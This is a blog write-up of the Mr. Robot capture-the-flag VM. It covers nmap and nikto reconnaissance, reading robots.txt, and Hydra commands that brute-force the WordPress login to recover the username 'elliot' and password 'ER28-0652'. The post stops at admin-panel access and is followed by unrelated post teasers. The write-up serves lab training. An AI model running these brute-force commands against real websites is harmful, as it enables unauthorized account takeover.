mrrobot Writeup(Walkthrough Step by Step)

-

 Mr. Robot Walkthrough

The VM is called Mr Robot and is themed after the TV show of the same name. It contains 3 flags to find, each of increasing difficulty.

____________________________________

Let’s start by a quick port scan.

$ nmap -sS -T4 target

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-04-03 12:25 EDT
Nmap scan report for vm (target)
Host is up (0.00025s latency).
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
443/tcp open https


Nothing fancy, just a web server running.






The website basically tells you a few things, and lets you input some commands. After a quick test, those don’t seem very useful.

As always, I then start by taking a look at the robots.txt file.



/robots.txt

User-agent: *
fsocity.dic
key-1-of-3.txt

Alright, we already have the first flag! The second file looks promising.

$ file fsocity.dic
fsocity.dic: ASCII text, with very long lines

$ cat fsocity.dic | wc -l 
858160 fsocity.dic

$ head fsocity.dic
true
false
wikia
from
the
now
Wikia
extensions
scss
window

That looks like a custom word list with 800k+ words in it However, a lot of them seem to be repeated:

$ sort fsocity.dic | uniq | wc -l
11451

To store in a file : 

$ sort fsocity.dic | uniq > fsocitysorted.dic
11451

To find we used http-enum.nse in our lab, there are various tools to find sub directory here I used nikto:

nikto -h target
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: target
+ Target Hostname: target
+ Target Port: 80
+ Start Time: 2017-04-03 18:32:36 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache
(...)
+ /readme.html: This WordPress file reveals the installed version.
+ /wp-admin/wp-login.php: WordPress login found
+ /wp-login.php: WordPress login found
---------------------------------------------------------------------------
+ 1 host(s) tested


We clearly have a wordpress install here. If we browse to /readme.html, we can see that the WordPress version used is 4.3.9.

The next thing I did was to run WpScan against the machine. It revealed several outdated modules, but nothing I managed to exploit.

Therefore, I decided to focus on the administration panel and to try to brute force the administrator credentials. The first step to do this is to find a valid username. Unfortunately the website doesn’t seem to contain any post, so no author information appears. WpScan also fails to enumerate the users.

Fortunately there exists a very handy tool called Hydra that allows to brute force almost anything, including usernames in a HTTP form. Here’s the POST request made when we try to log in on /wp-login.php

When we tried to login using common credentials the following error popped up.



hydra -t 64 -L fsocitysorted.dic -p wedontcare target_ip http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'

Let’s break it down:

  • -t : Thread running(64)
  • -L fsocity.dic.uniq : Try all the usernames from the file fsocity.dic.uniq
  • -p wedontcare : Use an unique password, it doesn’t matter (we’re only interested in the username for now)
  • target_ip : The IP of the machine we’re attacking
  • http-post-form : What we’re trying to brute force, here a HTTP POST form
  • ‘/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username’
    • /wp-login.php : The path to where the form is located
    • log=^USER^&pwd=^PASS^&wp-submit=Log+In : The POST parameters to send. ^USER^ and ^PASS^ are placeholders that wiil be replaced with the actual values.
    • F=Invalid username : Consider an attempt as a failure (F) if the response contains the text Invalid username

After a few minutes, we get:

[80][http-post-form] host: 192.168.2.4 login: elliot password: wedontcare

Now we know there is a WordPress user named elliot

Another error we found after proper username was inserted.



Let’s try to bruteforce his password using the same technique and word list, shall we?

$ hydra -t 64 -l elliot -P fsocitysorted.dic target_ip http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'

[80][http-post-form] host: 192.168.2.4 login: elliot password: ER28-0652
1 of 1 target successfully completed, 1 valid password found

At last we found both credentials and accessed WordPress panel.



Enjoy! 





Comments

Post a Comment

Popular posts from this blog

Must Know 60 Basic Linux Commands

-
Foundational commands you need to navigate through directories, manipulate files, and maintain your system’s integrity. Basic Commands - whoami: Quickly identify the current user. - pwd: Print the current working directory path. - mkdir: Create a new directory. - ls: List directory contents. - cd: Change directory. - cd .. : Move up one directory level. - clear: Clear the terminal screen. - touch: Create a new file. - rm: Remove files or directories. - cat: Concatenate and display file content. - rm -r: Remove directories recursively. - vi editor: Launch the Vi text editor for file manipulation. - sed: Stream editor for filtering and transforming text. - more, less, head, tail: Utilities for viewing text files. - sort: Sort lines of text files. - man: Access the system manual. - history: Display command history. - tar: Archive files. - grep: Search for patterns in text. - grep with pipe: Utilize piping with grep for advanced text filtering. - mount: Mount filesystems. - fdisk: Partitio...
Read more

Optimizing Blockchain Processes with Cloud Containerization Techniques

-
  Introduction Blockchain technology has revolutionized the way transactions are conducted and data is stored. With the rise of blockchain applications across various industries, the need streamline workflows and enhance security has become paramount. In this blog post, we will delve into the intersection of blockchain and cloud containerization, exploring the benefits of implementing containerization strategies to optimize blockchain processes. Understanding the Intersection of Blockchain and Cloud Containerization Blockchain is a distributed ledger technology that enables secure and transparent transactions. On the other hand, cloud containerization involves encapsulating applications and their dependencies into standardized units for seamless deployment and management. By combining the two technologies, organizations can leverage the scalability and flexibility of cloud environments to enhance the performance of their blockchain networks. Importance of Streamlining Workflows in ...
Read more